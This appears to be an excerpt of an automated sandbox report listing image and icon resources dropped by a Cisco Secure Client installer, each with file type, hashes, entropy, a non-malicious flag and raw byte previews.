                                                                                                                                      Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\attention.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\cisco_blue.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\cisco_indigo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\cisco_secure_client.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\cisco_secure_endpoint.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\collapse.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\company_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\company_logo_alt.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\cues_bg.jpg (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\error.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\expand.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\gradient.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-0VFM3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-18PET.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-197HM.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
